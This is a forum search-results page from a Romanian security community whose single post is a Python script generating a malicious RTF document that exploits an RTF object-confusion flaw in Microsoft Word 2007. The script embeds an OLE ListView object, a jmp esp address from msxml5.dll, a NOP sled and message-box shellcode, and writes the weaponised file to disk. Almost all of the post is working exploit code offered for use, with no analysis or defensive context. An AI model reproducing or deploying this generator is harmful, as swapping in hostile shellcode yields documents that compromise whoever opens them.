Jump to content

Search the Community

Showing results for tags 'word'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 1 result

  1. # Title : Microsoft Office Word 2007 - RTF Object Confusion ASLR and DEP bypass # Date : 28/02/2015 # Author : R-73eN # Software : Microsoft Office Word 2007 # Tested : Windows 7 Starter import sys # Windows Message Box / all versions . Thanks to Giuseppe D'amore for the shellcode . shellcode = '31d2b230648b128b520c8b521c8b42088b72208b12807e0c3375f289c703783c8b577801c28b7a2001c731ed8b34af01c645813e4661746175f2817e084578697475e98b7a2401c7668b2c6f8b7a1c01c78b7caffc01c76879746501686b656e42682042726f89e1fe490b31c05150ffd7' #filecontent content="{\\rtf1" content+="{\\fonttbl{\\f0\\fnil\\fcharset0Verdana;}}" content+="\\viewkind4\\uc1\\pard\\sb100\\sa100\\lang9\\f0\\fs22\\par" content+="\\pard\\sa200\\sl276\\slmult1\\lang9\\fs22\\par" content+="{\\object\\objocx" content+="{\\*\\objdata" content+="\n" content+="01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E320000" content+="00000000000000000E0000" content+="\n" content+="D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF09000600000000000000" content+="00000000010000000100000000000000001000000200000001000000FEFFFFFF0000000000000000" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFFFEFFFFFF" content+="FEFFFFFF0400000005000000FEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E007400" content+="72007900000000000000000000000000000000000000000000000000000000000000000000000000" content+="000000000000000016000500FFFFFFFFFFFFFFFF020000004BF0D1BD8B85D111B16A00C0F0283628" content+="0000000062eaDFB9340DCD014559DFB9340DCD0103000000000600000000000003004F0062006A00" content+="49006E0066006F000000000000000000000000000000000000000000000000000000000000000000" content+="0000000000000000000000000000000012000200FFFFFFFFFFFFFFFFFFFFFFFF0000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000600000000000000" content+="03004F00430058004E0041004D004500000000000000000000000000000000000000000000000000" content+="000000000000000000000000000000000000000000000000120002010100000003000000FFFFFFFF" content+="00000000000000000000000000000000000000000000000000000000000000000000000001000000" content+="160000000000000043006F006E00740065006E007400730000000000000000000000000000000000" content+="000000000000000000000000000000000000000000000000000000000000000012000200FFFFFFFF" content+="FFFFFFFFFFFFFFFF0000000000000000000000000000000000000000000000000000000000000000" content+="00000000020000007E05000000000000FEFFFFFFFEFFFFFF03000000040000000500000006000000" content+="0700000008000000090000000A0000000B0000000C0000000D0000000E0000000F00000010000000" content+="11000000120000001300000014000000150000001600000017000000FEFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" content+="FFFFFFFFFFFFFFFF0092030004000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000004C00690073007400" content+="56006900650077004100000000000000000000000000000000000000000000000000000000000000" content+="0000000000000000000000000000000021433412080000006ab0822cbb0500004E087DEB01000600" content+="1C000000000000000000000000060001560A000001EFCDAB00000500985D65010700000008000080" content+="05000080000000000000000000000000000000001FDEECBD01000500901719000000080000004974" content+="6D736400000002000000010000000C000000436F626A640000008282000082820000000000000000" content+="000000000000" content+= 'cb818278'# Address=788281CB jmp esp | {PAGE_EXECUTE_READ} [msxml5.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.20.1072.0 (C:\Program Files\Common Files\Microsoft Shared\OFFICE11\msxml5.dll) content+="9090909090909090" #nops content+= shellcode #junk content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000000000000000000000000000000000000000000000000000000000000000000000" content+="00000000000000" content+="\n" content+="}" content+="}" content+="}" banner = "\n\n" banner +=" ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_|[] /_/ \_\_____|\n\n" print banner if(len(sys.argv) < 2): print '\n Usage : exploit.py filename.rtf' else: filename = sys.argv[1] f=open(filename,"w") f.write(content) f.close() print '\n[ + ] File ' + sys.argv[1] + ' created [ + ]\n'
×
×
  • Create New...